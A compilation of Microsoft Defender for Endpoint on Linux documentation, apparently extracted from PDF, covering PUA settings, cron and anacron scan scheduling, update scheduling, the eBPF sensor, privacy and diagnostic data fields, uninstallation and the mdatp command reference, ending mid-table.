You can configure how PUA files are handled from the command line or from the
management console.
Use the command-line tool to configure PUA protection:

In Terminal, execute the following command to configure PUA protection:
Bash
mdatp threat policy set --type potentially_unwanted_application --action

[off|audit|block]
Use the management console to configure PUA

protection:
In your enterprise, you can configure PUA protection from a management console, such
as Puppet or Ansible, similarly to how other product settings are configured. For more
information, see the Threat type settings section of the Set preferences for Defender for
Endpoint on Linux article.
Related articles
Set preferences for Defender for Endpoint on Linux
 Tip
Feedback

Schedule scans with Microsoft Defender
for Endpoint (Linux)
Article • 02/21/2024
Applies to:

To run a scan for Linux, see Supported Commands.
For Linux (and Unix), you can use a tool called crontab (similar to Task Scheduler in
Windows) to run scheduled tasks.
Prerequisite
７ Note
To get a list of all the time zones, run the following command: timedatectl list-
timezones
Examples for timezones:
America/Los_Angeles
America/New_York
America/Chicago
America/Denver
To set the Cron job

Use the following commands:
Backup crontab entries

Bash
sudo crontab -l > /var/tmp/cron_backup_200919.dat

７ Note
Where 200919 == YRMMDD
 Tip
Do this before you edit or remove.
To edit the crontab, and add a new job as a root user:
Bash
sudo crontab -e
７ Note
The default editor is VIM.
You might see:
outbou
0 * * * * /etc/opt/microsoft/mdatp/logrorate.sh
Press "Insert"
Add the following entries:
Bash
CRON_TZ=America/Los_Angeles
0 2 * * sat /bin/mdatp scan quick > ~/mdatp_cron_job.log
７ Note
In this example, we have set it to 00 minutes, 2 a.m. (hour in 24 hour format), any
day of the month, any month, on Saturdays. Meaning it will run Saturdays at 2:00
a.m. Pacific (UTC -8).
Press "Esc"
Type " :wq " without the double quotes.
７ Note
w == write, q == quit
To view your cron jobs, type sudo crontab -l
To inspect cron job runs
Bash
sudo grep mdatp /var/log/cron
To inspect the mdatp_cron_job.log*
Bash
sudo nano mdatp_cron_job.log
If you're using Ansible, Chef, Puppet, or

SaltStack
To set cron jobs in Ansible

Bash
cron - Manage cron.d and crontab entries
For more information, see Ansible documentation .

To set crontabs in Chef
Bash
cron resource
For more information, see Chef documentation .
To set cron jobs in Puppet

Bash
Resource Type: cron
See https://puppet.com/docs/puppet/5.5/types/cron.html for more information.
Automating with Puppet: Cron jobs and scheduled tasks
For more information, see Puppet documentation about jobs and scheduled tasks .
To manage cron jobs in SaltStack

Bash
Resource Type: salt.states.cron
Example:
yml
mdatp scan quick > /tmp/mdatp_scan_log.log:

cron.present:
- special: '@hourly'
For more information, see the Salt.States.Cron documentation .
Additional information
To get help with crontab

Bash
man crontab
To get a list of crontab file of the current user

Bash
crontab -l
To get a list of crontab file of another user

Bash
crontab -u username -l
To back up crontab entries

Bash
crontab -l > /var/tmp/cron_backup.dat
 Tip
To restore crontab entries

Bash
crontab /var/tmp/cron_backup.dat
To edit the crontab and add a new job as a root user

Bash
sudo crontab -e
To edit the crontab and add a new job
Bash
crontab -e
To edit other user's crontab entries

Bash
crontab -u username -e
To remove all crontab entries

Bash
crontab -r
To remove other user's crontab entries

Bash
crontab -u username -r
Explanation
+—————- minute (values: 0 - 59) (special characters: , \- \* /) <br>

| +————- hour (values: 0 - 23) (special characters: , \- \* /) <br>
| | +———- day of month (values: 1 - 31) (special characters: , \- \* / L W
C) <br>
| | | +——- month (values: 1 - 12) (special characters: , \- \* /) <br>
| | | | +—- day of week (values: 0 - 6) (Sunday=0 or 7) (special characters:
, \- \* / L W C) <br>
| | | | |*****command to be executed
 Tip
Feedback

Schedule an antivirus scan using
Anacron in Microsoft Defender for
Endpoint on Linux
Article • 07/18/2023
Applies to:

To run a scan of Microsoft Defender Antivirus for Linux, see Supported Commands.
７ Note
This article supports Microsoft Defender for Endpoint on Linux for Red Hat
Enterprise Linux distributions (RHEL).
System requirements
See the following system requirements needed to schedule Microsoft Defender
Antivirus scan in Microsoft Defender Endpoint on Linux.
Linux server distributions and versions: Red Hat Enterprise Linux 7.2 or higher.
The FANOTIFY option in kernel must be enabled.
Scheduling Microsoft Defender Antivirus scan

in Red Hat Linux
You can schedule cron jobs to initiate Microsoft Defender Antivirus scans on a schedule.
For more information, see How to schedule scans with Microsoft Defender for Endpoint
on Linux. This process works well if the device is always up and running.
But if the Linux devices are shut down or offline during the cron schedule, the scan
won't run. In these situations, you can use anacron to read the timestamp and find the
last executed job. If the device was shut down during the scheduled cron job, it needs to
wait until the next scheduled time. By using anacron, the system will detect the last time
the scan was run. If the device didn't run the cron job, it will automatically start it.
Schedule Microsoft Defender Antivirus scans in Red Hat
Linux
Use the following steps to schedule scans:
1. Connect to the RedHat server using PuTTY.
2. Edit the anacron file:
shell
vi /etc/anacron
3.
shell
# /etc/anacrontab: configuration file for anacron

# See anacron (8) and anacrontab (5) for details.
SHELL=/bin/sh
PATH=/sbin:/bin:/usr/sbin:/usr/bin
RANDOM_DELAY=45
# Anacron jobs will start between 8pm and 11pm.
START_HOURS_RANGE=20-23
# delay will be 5 minutes + RANDOM_DELAY for cron.daily
1. Note the following items in the file.

a. Shell: Shell is referred as /bin/sh , and not as /bin/bash . Remember when
writing the jobs.
b. RANDOM_DELAY: Describes the maximum time in minutes for the job. This
value is used to offset the jobs so there wouldn't be too many jobs running at
the same time. Using this delay is ideal for VDI solutions.
c. START_HOURS_RANGE: Describes the time range to run the job.
d. cron.daily: Describes 1 as the period of days required for the frequency of job
executions. 5 is the delay in minutes that anacron waits after the device restarts.
2. Review look at the anacron jobs:
shell
ls -lh /etc/cron*
shell
[root@redhat7 /] # ls -lh /etc/cron*

- rw - - - - - - -. 1 root root 0 Nov 30 2021 /etc/cron.deny
- rw - r - - r - -. 1 root root 451 Dec 27 2013 /etc/crontab
/etc/cron.d:
total 28k
- rw - r - - r - -. 1 root root 128 Nov 30 2021 0hourly
- rw - r - - r - -. 1 root root 121 Feb 25 18:11
omilogotate
- rw - r - - r - -. 1 root root 118 Feb 25 18:14 omsagent
- rw - r - - r - -. 1 root root 79 Feb 25 18:15
OMSConsistencyInvoker
- rw - r - - r - -. 1 root root 108 Nov 9 2021 raid-check
- rw - r - - r - -. 1 root root 135 Jun 1 22:35 scxagent
- rw - - - - - - -. 1 root root 235 Jan 20 2020 sysstat
/etc/cron.daily:
total 24k
- rwxr - xr - x. 1 root root 127 Jun 14 16:49 avscandaily
- rwx - - - - - -. 1 root root 219 Aug 7 2019 logrotate
- rwxr - xr - x. 1 root root 618 Jul 10 2018 man-db.cron
- rwx - - - - - -. 1 root root 208 Nov 9 2017 mlocate
- rwx - - - - - -. 1 root root 558 Apr 18 19:03 rhsmd
- rwxr - xr - x. 1 root root 114 Apr 8 2021 rhui-update-
client
/etc/cron.hourly:
total 8.0k
- rwxr - xr - x. 1 root root 392 Nov 30 2021 0anacron
- rwxr - xr - x. 1 root root 131 Jun 14 17:05 update
/etc/cron.monthly:
total 0
- rwxr - xr - x. 1 root root 0 Jun 14 17:47 mdatpupdate
/etc/cron.weekly:
total 0
3. Ignore the /etc/cron.d directory, you will see /etc/cron.daily, hourly, monthly,
and weekly .
4. To schedule a weekly antivirus scan, you can create a file (Job) under the
/etc/cron.weekly directory.
shell
cd /etc/cron.weekly
vi mdavfullscan
Press Insert
shell
#!/bin/sh
set -e
echo $(date) "Time Scan Begins" >>/logs/mdav_avacron_full_scan.log
/bin/mdatp scan full >> /logs/mdav_avacron_full_scan.log
echo $(date) "Time Scan Finished" >>/logs/mdav_avacron_full_scan.log
exit 0
~
Press Esc
Type: wq!
5. Change the file permissions to allow the file to be executed.
shell
Chmod 755 mdavfullscan

ls -la
shell
[root@redhat7 cron.weekly]# ls -la

total 16
drwxr - xr - x. 2 root root 26 Jun 14 19:19 .
drwxr - xr - x. 85 root root 8192 Jun 14 19:01 ..
- rw - r - - r - -. 1 root root 128 Jun 14 19:19
mdavfullscan
[root@redhat7 cron.weekly] # chmod 755 mdavfullscan
[root@redhat7 cron.weekly] # ls -lh
total 4. 0k
- rwxr - xr - x. 1 root root 128 Jun 14 19:19 mdavfullscan
[root@redhat7 cron.weekly] #
6. Use the command to test the weekly anacron job.
shell
./mdavfullscan
7. Use the command to verify the job ran successfully.
shell
cat /logs/mdav_avacron_full_scan.log
shell
[root@redhat7 cron.weekly] # cat /logs/mdav_avacron_full_scan.log
Tue Jun 14 20:20:44 UTC 2022 Time Scan Begins
Scan has finished
66547 file(s) scanned
0 threat(s) detected
Tue Jun 14 20:20:50 UTC 2022 Time Scan Finished
[root@redhat7 cron.weekly] #
 Tip
Feedback

Schedule an update of the Microsoft
Defender for Endpoint (Linux)
Article • 01/26/2024
Applies to:

To run an update on Microsoft Defender for Endpoint on Linux, see Deploy updates for
Linux (and Unix) have a tool called crontab (similar to Task Scheduler) to be able to run
scheduled tasks.
Pre-requisite
７ Note
To get a list of all the time zones, run the following command: timedatectl list-
timezones
Examples for timezones:
America/Los_Angeles
America/New_York
America/Chicago
America/Denver
To set the Cron job

Backup crontab entries

Bash
sudo crontab -l > /var/tmp/cron_backup_201118.dat

７ Note
Where 201118 == YYMMDD
 Tip
To edit the crontab, and add a new job as a root user:
Bash
sudo crontab -e
７ Note
The default editor is VIM.
You might see:
Output
0 * * * * /etc/opt/microsoft/mdatp/logrorate.sh
And
Output
0 2 * * sat /bin/mdatp scan quick>~/mdatp_cron_job.log
See Schedule scans with Microsoft Defender for Endpoint (Linux)
Press "Insert"
Add the following entries:
Bash
CRON_TZ=America/Los_Angeles
#!RHEL and variants (CentOS and Oracle Linux)

Bash
0 6 * * sun [ $(date +%d) -le 15 ] && sudo yum update mdatp -y >>
~/mdatp_cron_job.log
#!SLES and variants
Bash
0 6 * * sun [ $(date +%d) -le 15 ] && sudo zypper update mdatp >>
~/mdatp_cron_job.log
#!Ubuntu and Debian systems
Bash
0 6 * * sun [ $(date +%d) -le 15 ] && sudo apt-get install --only-

upgrade mdatp >> ~/mdatp_cron_job.log
７ Note
In the examples above, we are setting it to 00 minutes, 6 a.m.(hour in 24 hour

format), any day of the month, any month, on Sundays.[$(date +%d) -le 15] ==
Won't run unless it's equal or less than the 15th day (3rd week). Meaning it will run
every 3rd Sundays(7) of the month at 6:00 a.m. Pacific (UTC -8).
Press "Esc"
Type " :wq " w/o the double quotes.
７ Note
w == write, q == quit
To view your cron jobs, type sudo crontab -l

To inspect cron job runs:
Bash
sudo grep mdatp /var/log/cron
To inspect the mdatp_cron_job.log
Bash
sudo nano mdatp_cron_job.log
For those who use Ansible, Chef, or Puppet

To set cron jobs in Ansible

Bash
cron - Manage cron.d and crontab entries
See https://docs.ansible.com/ansible/latest/modules/cron_module.html for more

information.
To set crontabs in Chef

Bash
cron resource
See https://docs.chef.io/resources/cron/ for more information.
To set cron jobs in Puppet

Resource Type: cron
See https://puppet.com/docs/puppet/5.5/types/cron.html for more information.
Automating with Puppet: Cron jobs and scheduled tasks

See https://puppet.com/blog/automating-puppet-cron-jobs-and-scheduled-tasks/ for
more information.
To get help with crontab

Bash
man crontab
To get a list of crontab file of the current user

Bash
crontab -l
To get a list of crontab file of another user

Bash
crontab -u username -l
To back up crontab entries

Bash
crontab -l > /var/tmp/cron_backup.dat
 Tip
To restore crontab entries

Bash
crontab /var/tmp/cron_backup.dat
To edit the crontab and add a new job as a root user

Bash
sudo crontab -e
To edit the crontab and add a new job

Bash
crontab -e
To edit other user's crontab entries

Bash
crontab -u username -e
To remove all crontab entries

Bash
crontab -r
To remove other user's crontab entries

Bash
crontab -u username -r
Explanation
+—————- minute (values: 0 - 59) (special characters: , - * /)
| +————- hour (values: 0 - 23) (special characters: , - * /)

| | +———- day of month (values: 1 - 31) (special characters: , - * / L W C)
| | | +——- month (values: 1 - 12) (special characters: ,- * / )
| | | | +—- day of week (values: 0 - 6) (Sunday=0 or 7) (special characters:

, - * / L W C)
| | | | |*****command to be executed
 Tip
Feedback

Use eBPF-based sensor for Microsoft
Defender for Endpoint on Linux
Article • 02/21/2024
Applies to:

The extended Berkeley Packet Filter (eBPF) for Microsoft Defender for Endpoint on Linux
provides supplementary event data for Linux operating systems. eBPF can be used as an
alternative technology to auditd because eBPF helps address several classes of issues
seen with the auditd event provider and is beneficial in the areas of performance and
system stability.
Key benefits include:
Reduced system-wide auditd-related log noise

Optimized system-wide event rules otherwise causing conflict between
applications
Reduced overhead for file event (file read/open) monitoring
Improved event rate throughput and reduced memory footprint
Optimized performance for specific configurations
How eBPF works

With eBPF, events previously obtained from the auditd event provider now flow from
the eBPF sensor. This helps with system stability, improves CPU and memory utilization,
and reduces disk usage. Also, when eBPF is enabled, all auditd-related custom rules are
eliminated, which helps reduce the possibility of conflicts between applications. Data
related to eBPF gets logged into the
/var/log/microsoft/mdatp/microsoft_defender_core.log file.
In addition, the eBPF sensor uses capabilities of the Linux kernel without requiring the
use of a kernel module that helps increase system stability.
７ Note
eBPF is used in conjunction with auditd, whereas auditd is used only for user login
events and captures these events without any custom rules and flow them
automatically. Be aware that auditd will be gradually removed in future versions.
System prerequisites
The eBPF sensor for Microsoft Defender for Endpoint on Linux is supported on the
following minimum distribution and kernel versions:
ﾉ Expand table
Linux Distribution Distribution version Kernel version
Ubuntu 16.04 4.15.0
Fedora 33 5.8.15
CentOS 7.6 3.10.0-957.10
SLES 15 5.3.18-18.47
RHEL 7.6 3.10.0-957.10
Debian 9.0 4.19.0
Oracle Linux RHCK 7.9 3.10.0-1160
Oracle Linux UEK 7.9 5.4
Amazon Linux 2 2 5.4.261-174.360
７ Note
Oracle Linux 8.8 with kernel version 5.15.0-0.30.20.el8uek.x86_64, 5.15.0-

0.30.20.1.el8uek.x86_64 will result in kernel hang when eBPF is enabled as
supplementary subsystem provider. This kernel version should not be used for eBPF
mode. Refer to Troubleshooting and Diagnostics section for mitigation steps.
Use eBPF
The eBPF sensor is automatically enabled for all customers by default for agent versions
"101.23082.0006" and above. Customers need to update to the above-mentioned
supported versions to experience the feature. When the eBPF sensor is enabled on an
endpoint, Defender for Endpoint on Linux updates supplementary_events_subsystem to
ebpf.
In case you want to manually disable eBPF then you can run the following command:
Bash
sudo mdatp config ebpf-supplementary-event-provider --value

[enabled/disabled]
You can also update the mdatp_managed.json file:
JSON
{
"features": {
"ebpfSupplementaryEventProvider": "disabled"
}
}
Refer to the link for detailed sample json file - Set preferences for Microsoft Defender
） Important
If you disable eBPF, the supplementary event provider switches back to auditd. In
the event eBPF doesn't become enabled or is not supported on any specific kernel,
it will automatically switch back to auditd and retain all auditd custom rules.
Immutable mode of Auditd
For customers using auditd in immutable mode, a reboot is required post enablement of
eBPF in order to clear the audit rules added by Microsoft Defender for Endpoint. This is
a limitation in immutable mode of auditd, which freezes the rules file and prohibits
editing/overwriting. This issue is resolved with the reboot. Post reboot, run the below
command to check if audit rules got cleared.
Bash
% sudo auditctl -l
The output of above command should show no rules or any user added rules. In case
the rules didn't get removed, then perform the following steps to clear the audit rules
file.
1. Switch to ebpf mode

2. Remove the file /etc/audit/rules.d/mdatp.rules
3. Reboot the machine
Troubleshooting and Diagnostics

You can check the agent health status by running the mdatp health command. Make
sure that the eBPF sensor for Defender for Endpoint on Linux is supported by checking
the current kernel version by using the following command line:
Bash
uname -a
Known Issues
1. Enabling eBPF on RHEL 8.1 version with SAP might result in kernel panic. To
mitigate this issue you can take one of the following steps:
Use a distro version higher than RHEL 8.1.

Switch to auditd mode if you need to use RHEL 8.1 version
2. Using Oracle Linux 8.8 with kernel version 5.15.0-0.30.20.el8uek.x86_64, 5.15.0-

0.30.20.1.el8uek.x86_64 might result in kernel panic. To mitigate this issue you can
take one of the following steps:
Use a kernel version higher or lower than 5.15.0-0.30.20.el8uek.x86_64,
5.15.0-0.30.20.1.el8uek.x86_64 on Oracle Linux 8.8 if you want to use eBPF as
supplementary subsystem provider. Note that the minimum kernel version
for Oracle Linux is RHCK 3.10.0 and Oracle Linux UEK is 5.4
Switch to auditd mode if you need to use the same kernel version
Bash
sudo mdatp config ebpf-supplementary-event-provider --value disabled
The following two sets of data help analyze potential issues and determine the most
effective resolution options.
1. Collect a diagnostic package from the client analyzer tool by using the following
instructions: Troubleshoot performance issues for Microsoft Defender for Endpoint
on Linux.
2. Collect a debug diagnostic package when Defender for Endpoint is utilizing high
resources by using the following instructions: Microsoft Defender for Endpoint on
Linux resources.
Troubleshooting performance issues

If you see a hike in resource consumption by Microsoft Defender on your endpoints, it's
important to identify the process/mount-point/files that is consuming most
CPU/Memory utilization and then apply necessary exclusions. After applying possible AV
exclusions, if wdavdaemon (parent process) is still consuming the resources, then use
the ebpf-statistics command to obtain the top system call count:
Bash
sudo mdatp diagnostic ebpf-statistics
Output
Output
Monitor 20 seconds
Top file paths:
/var/log/microsoft/mdatp/microsoft_defender.log : 10
/var/log/microsoft/mdatp/rotated/microsoft_defender.log00001 : 2
/var/log/microsoft/mdatp/rotated/microsoft_defender.log : 1
/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374993
: 1
: 1
: 1
: 1
: 1
: 1
: 1
Top initiator paths:

/usr/bin/stress-ng : 50000
/opt/microsoft/mdatp/sbin/wdavdaemon : 13
Top syscall ids:

82 : 1699333
90 : 10
87 : 3
In the above output, you can see that stress-ng is the top process generating large
number of events and might result into performance issues. Most likely stress-ng is
generating the system call with ID 82. You can create a ticket with Microsoft to get this
process excluded. In future as part of upcoming enhancements, you'll have more control
to apply such exclusions at your end.
Exclusions applied to auditd can't be migrated or copied to eBPF. Common concerns

such as noisy logs, kernel panic, noisy syscalls are already taken care of by eBPF
internally. In case you want to add any further exclusions, then reach out to Microsoft to
get the necessary exclusions applied.
See also
Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux resources
Feedback

Deploy updates for Microsoft Defender
Article • 11/15/2023
Applies to:


deliver new features.
２ Warning
Each version of Defender for Endpoint on Linux is set to expire automatically after 9
months. While expired versions continue to receive security intelligence updates,
install the latest version to get all available fixes and enhancements.
To check the expiration date, run the following command:
Bash
mdatp health --field product_expiration
Generally available Microsoft Defender for Endpoint capabilities are equivalent

regardless update channel used for a deployment (Beta (Insider), Preview (External),
Current (Production)).
To update Defender for Endpoint on Linux manually, execute one of the following
commands:
RHEL and variants (CentOS and Oracle Linux)

Bash
sudo yum update mdatp

SLES and variants
Bash
sudo zypper update mdatp

Bash
sudo apt-get install --only-upgrade mdatp
） Important
When Defender for Cloud is provisioning the Microsoft Defender for Endpoint
agent to Linux servers, it will keep the client updated automatically.
To schedule an update of Microsoft Defender for Endpoint on Linux, see Schedule an

update of the Microsoft Defender for Endpoint (Linux)
 Tip
Feedback

Privacy for Microsoft Defender for
Endpoint on Linux
Article • 02/07/2023
Applies to:

Microsoft is committed to provide you with the information and controls you need to
make choices about how your data is collected and used when you're using Defender
This article describes the privacy controls available within the product, how to manage
these controls with policy settings, and more details on the data events that are
collected.
Overview of privacy controls in Microsoft

This section describes the privacy controls for the different types of data that is collected
by Defender for Endpoint on Linux.
Diagnostic data
Diagnostic data is used to keep Defender for Endpoint secure and up to date, detect,
diagnose and fix problems, and also make product improvements.
Some diagnostic data is required, while some diagnostic data is optional. We give you
the ability to choose whether to send us required or optional diagnostic data by using
privacy controls, such as policy settings for organizations.
There are two levels of diagnostic data for Defender for Endpoint client software that
you can choose from:
Required: The minimum data necessary to help keep Defender for Endpoint
secure, up to date, and performing as expected on the device it's installed on.
Optional: Other data that helps Microsoft make product improvements and
provides enhanced information to help detect, diagnose, and remediate issues.
By default, only required diagnostic data is sent to Microsoft.
Cloud delivered protection data

Cloud delivered protection is used to provide increased and faster protection with
access to the latest protection data in the cloud.
Enabling the cloud-delivered protection service is optional, however it's highly

recommended because it provides important protection against malware on your
endpoints and across your network.
Sample data
Sample data is used to improve the protection capabilities of the product, by sending
Microsoft suspicious samples so they can be analyzed. Enabling automatic sample
submission is optional.
There are three levels for controlling sample submission:
None: no suspicious samples are submitted to Microsoft.

Safe: only suspicious samples that don't contain personally identifiable information
(PII) are submitted automatically. This is the default value.
All: all suspicious samples are submitted to Microsoft.
Manage privacy controls with policy settings

If you're an IT administrator, you might want to configure these controls at the
enterprise level.
The privacy controls for the various types of data that is described in the preceding
section are described in detail in Set preferences for Defender for Endpoint on Linux.
As with any new policy settings, you should carefully test them out in a limited,
controlled environment to ensure the settings that you configure have the desired effect
before you implement the policy settings more widely in your organization.
Diagnostic data events

This section describes what is considered required diagnostic data and what is
considered optional diagnostic data, along with a description of the events and fields
that are collected.
Data fields that are common for all events

There's some information about events that is common to all events, regardless of
category or data subtype.
The following fields are considered common for all events:
ﾉ Expand table
Field Description
platform The broad classification of the platform on which the app is running.
Allows Microsoft to identify on which platforms an issue may be
occurring so that it can correctly be prioritized.
machine_guid Unique identifier associated with the device. Allows Microsoft to

sense_guid Unique identifier associated with the device. Allows Microsoft to

org_id Unique identifier associated with the enterprise that the device
belongs to. Allows Microsoft to identify whether issues are impacting
a select set of enterprises and how many enterprises are impacted.
hostname Local device name (without DNS suffix). Allows Microsoft to identify
whether issues are impacting a select set of installs and how many
users are impacted.
product_guid Unique identifier of the product. Allows Microsoft to differentiate

issues impacting different flavors of the product.
app_version Version of the Defender for Endpoint on Linux application. Allows

Microsoft to identify which versions of the product are showing an
issue so that it can correctly be prioritized.
sig_version Version of security intelligence database. Allows Microsoft to identify

which versions of the security intelligence are showing an issue so that
it can correctly be prioritized.
supported_compressions List of compression algorithms supported by the application, for

example ['gzip'] . Allows Microsoft to understand what types of
Field Description
compressions can be used when it communicates with the application.
release_ring Ring that the device is associated with (for example Insider Fast,
Insider Slow, Production). Allows Microsoft to identify on which
release ring an issue may be occurring so that it can correctly be
prioritized.
Required diagnostic data

Required diagnostic data is the minimum data necessary to help keep Defender for
Endpoint secure, up to date, and perform as expected on the device it's installed on.
Required diagnostic data helps to identify problems with Microsoft Defender for
Endpoint that may be related to a device or software configuration. For example, it can
help determine if a Defender for Endpoint feature crashes more frequently on a
particular operating system version, with newly introduced features, or when certain
Defender for Endpoint features are disabled. Required diagnostic data helps Microsoft
detect, diagnose, and fix these problems more quickly so the impact to users or
organizations is reduced.
Software setup and inventory data events

Microsoft Defender for Endpoint installation / uninstallation:
ﾉ Expand table
Field Description
correlation_id Unique identifier associated with the installation.
version Version of the package.
severity Severity of the message (for example Informational).
code Code that describes the operation.
text Additional information associated with the product installation.

ﾉ Expand table
Field Description
antivirus_engine.enable_real_time_protection Whether real-time protection is enabled on

the device or not.
antivirus_engine.passive_mode Whether passive mode is enabled on the

device or not.
cloud_service.enabled Whether cloud delivered protection is

enabled on the device or not.
cloud_service.timeout Time out when the application

communicates with the Defender for
Endpoint cloud.
cloud_service.heartbeat_interval Interval between consecutive heartbeats

sent by the product to the cloud.
cloud_service.service_uri URI used to communicate with the cloud.
cloud_service.diagnostic_level Diagnostic level of the device (required,

optional).
cloud_service.automatic_sample_submission Automatic sample submission level of the

device (none, safe, all).
cloud_service.automatic_definition_update_enabled Whether automatic definition update is

turned on or not.
edr.early_preview Whether the device should run EDR early

preview features.
edr.group_id Group identifier used by the detection and

response component.
edr.tags User-defined tags.
features.[optional feature name] List of preview features, along with whether

they're enabled or not.
Product and service usage data events

Security intelligence update report:
ﾉ Expand table
Field Description
from_version Original security intelligence version.
to_version New security intelligence version.
status Status of the update indicating success or failure.
using_proxy Whether the update was done over a proxy.
error Error code if the update failed.
reason Error message if the update failed.
Product and service performance data events for required

diagnostic data
ﾉ Expand table
Field Description
version Version of Defender for Endpoint on Linux.
instance_id Unique identifier generated on kernel extension startup.
trace_level Trace level of the kernel extension.
subsystem The underlying subsystem used for real-time protection.
ipc.connects Number of connection requests received by the kernel extension.
ipc.rejects Number of connection requests rejected by the kernel extension.
ipc.connected Whether there's any active connection to the kernel extension.
Support data
Diagnostic logs:
Diagnostic logs are collected only with the consent of the user as part of the feedback
submission feature. The following files are collected as part of the support logs:
All files under /var/log/microsoft/mdatp

Subset of files under /etc/opt/microsoft/mdatp that are created and used by
Product installation and uninstallation logs under /var/log/microsoft/mdatp/*.log
Optional diagnostic data

Optional diagnostic data is additional data that helps Microsoft make product
improvements and provides enhanced information to help detect, diagnose, and fix
issues.
If you choose to send us optional diagnostic data, required diagnostic data is also
included.
Examples of optional diagnostic data include data Microsoft collects about product
configuration (for example number of exclusions set on the device) and product
performance (aggregate measures about the performance of components of the
product).
Software setup and inventory data events for optional diagnostic

data
ﾉ Expand table
Field Description
connection_retry_timeout Connection retry time-out when

communication with the cloud.
file_hash_cache_maximum Size of the product cache.
crash_upload_daily_limit Limit of crash logs uploaded daily.
antivirus_engine.exclusions[].is_directory Whether the exclusion from scanning is a

directory or not.
antivirus_engine.exclusions[].path Path that was excluded from scanning.
antivirus_engine.exclusions[].extension Extension excluded from scanning.
antivirus_engine.exclusions[].name Name of the file excluded from scanning.
antivirus_engine.scan_cache_maximum Size of the product cache.

Field Description
antivirus_engine.maximum_scan_threads Maximum number of threads used for

scanning.
antivirus_engine.threat_restoration_exclusion_time Time out before a file restored from the

quarantine can be detected again.
antivirus_engine.threat_type_settings Configuration for how different threat types

are handled by the product.
filesystem_scanner.full_scan_directory Full scan directory.
filesystem_scanner.quick_scan_directories List of directories used in quick scan.
edr.latency_mode Latency mode used by the detection and

response component.
edr.proxy_address Proxy address used by the detection and

response component.
Microsoft Auto-Update configuration:
ﾉ Expand table
Field Description
how_to_check Determines how product updates are checked (for example automatic or
manual).
channel_name Update channel associated with the device.
manifest_server Server used for downloading updates.
update_cache Location of the cache used to store updates.
Product and service usage
Diagnostic log upload started report

ﾉ Expand table
Field Description
size Size of the support log.
original_path Path to the support log (always under /var/opt/microsoft/mdatp/wdavdiag/).
format Format of the support log.
Diagnostic log upload completed report

ﾉ Expand table
Field Description
request_id Correlation ID for the support log upload request.
blob_sas_uri URI used by the application to upload the support log.
Product and service performance data events for product service

and usage
Unexpected application exits and the state of the application when that happens.
ﾉ Expand table
Field Description
pkt_ack_timeout The following properties are aggregated numerical

values, representing count of events that happened since
kernel extension startup.
pkt_ack_conn_timeout
ipc.ack_pkts
Field Description
ipc.nack_pkts
ipc.send.ack_no_conn
ipc.send.nack_no_conn
ipc.send.ack_no_qsq
ipc.send.nack_no_qsq
ipc.ack.no_space
ipc.ack.timeout
ipc.ack.ackd_fast
ipc.ack.ackd
ipc.recv.bad_pkt_len
ipc.recv.bad_reply_len
ipc.recv.no_waiter
ipc.recv.copy_failed
ipc.kauth.vnode.mask
ipc.kauth.vnode.read
ipc.kauth.vnode.write
ipc.kauth.vnode.exec
ipc.kauth.vnode.del
ipc.kauth.vnode.read_attr
ipc.kauth.vnode.write_attr
ipc.kauth.vnode.read_ex_attr
ipc.kauth.vnode.write_ex_attr
ipc.kauth.vnode.read_sec
ipc.kauth.vnode.write_sec
ipc.kauth.vnode.take_own
ipc.kauth.vnode.link
Field Description
ipc.kauth.vnode.create
ipc.kauth.vnode.move
ipc.kauth.vnode.mount
ipc.kauth.vnode.denied
ipc.kauth.vnode.ackd_before_deadline
ipc.kauth.vnode.missed_deadline
ipc.kauth.file_op.mask
ipc.kauth_file_op.open
ipc.kauth.file_op.close
ipc.kauth.file_op.close_modified
ipc.kauth.file_op.move
ipc.kauth.file_op.link
ipc.kauth.file_op.exec
ipc.kauth.file_op.remove
ipc.kauth.file_op.unmount
ipc.kauth.file_op.fork
ipc.kauth.file_op.create
Resources
Privacy at Microsoft
 Tip
Feedback

Resources
Article • 11/07/2023
Applies to:

Collect diagnostic information

If you can reproduce a problem, first increase the logging level, run the system for some
time, and then restore the logging level to the default.
1. Increase logging level:
Bash
mdatp log level set --level debug
Output
2. Reproduce the problem.
3. Run the following command to back up Defender for Endpoint's logs. The files will
be stored inside of a .zip archive.
Bash
This command will also print out the file path to the backup after the operation
succeeds:
Output
Diagnostic file created: <path to file>

4. Restore logging level:
Bash
mdatp log level set --level info
Output

If an error occurs during installation, the installer will only report a general failure.
The detailed log will be saved to /var/log/microsoft/mdatp/install.log . If you

experience issues during installation, send us this file so we can help diagnose the cause.
Uninstall Defender for Endpoint on Linux

There are several ways to uninstall Defender for Endpoint on Linux. If you are using a
configuration tool such as Puppet, follow the package uninstallation instructions for the
configuration tool.
Manual uninstallation
sudo yum remove mdatp for RHEL and variants(CentOS and Oracle Linux).
sudo zypper remove mdatp for SLES and variants.
sudo apt-get purge mdatp for Ubuntu and Debian systems.

sudo dnf remove mdatp for Mariner
Configure from the command line

Important tasks, such as controlling product settings and triggering on-demand scans,
can be done from the command line.
Global options
By default, the command-line tool outputs the result in human-readable format. In
addition, the tool also supports outputting the result as JSON, which is useful for
automation scenarios. To change the output to JSON, pass --output json to any of the
below commands.
Supported commands
The following table lists commands for some of the most common scenarios. Run mdatp
help from the Terminal to view the full list of supported commands.
ﾉ Expand table
Configuration Turn on/off real-time mdatp config real-time-protection --value

protection [enabled\|disabled]
Configuration Turn on/off behavior mdatp config behavior-monitoring --value

monitoring [enabled\|disabled]
Configuration Turn on/off cloud protection mdatp config cloud --value

[enabled\|disabled]
Configuration Turn on/off product mdatp config cloud-diagnostic --value

diagnostics [enabled\|disabled]
Configuration Turn on/off automatic sample mdatp config cloud-automatic-sample-

submission submission --value [enabled\|disabled]
Configuration Turn on/off AV passive mode mdatp config passive-mode --value

[enabled\|disabled]
Configuration Add/remove an antivirus mdatp exclusion extension [add\|remove] --

exclusion for a file extension name [extension]
Configuration Add/remove an antivirus mdatp exclusion file [add\|remove] --path

exclusion for a file [path-to-file]
Configuration Add/remove an antivirus mdatp exclusion folder [add\|remove] --

exclusion for a directory path [path-to-directory]
Configuration Add/remove an antivirus mdatp exclusion process [add\|remove] --

exclusion for a process path [path-to-process]
mdatp exclusion process [add\|remove] --

name [process-name]
Configuration List all antivirus exclusions mdatp exclusion list

Configuration Add a threat name to the mdatp threat allowed add --name [threat-
allowed list name]
Configuration Remove a threat name from mdatp threat allowed remove --name
the allowed list [threat-name]
Configuration List all allowed threat names mdatp threat allowed list
Configuration Turn on PUA protection mdatp threat policy set --type

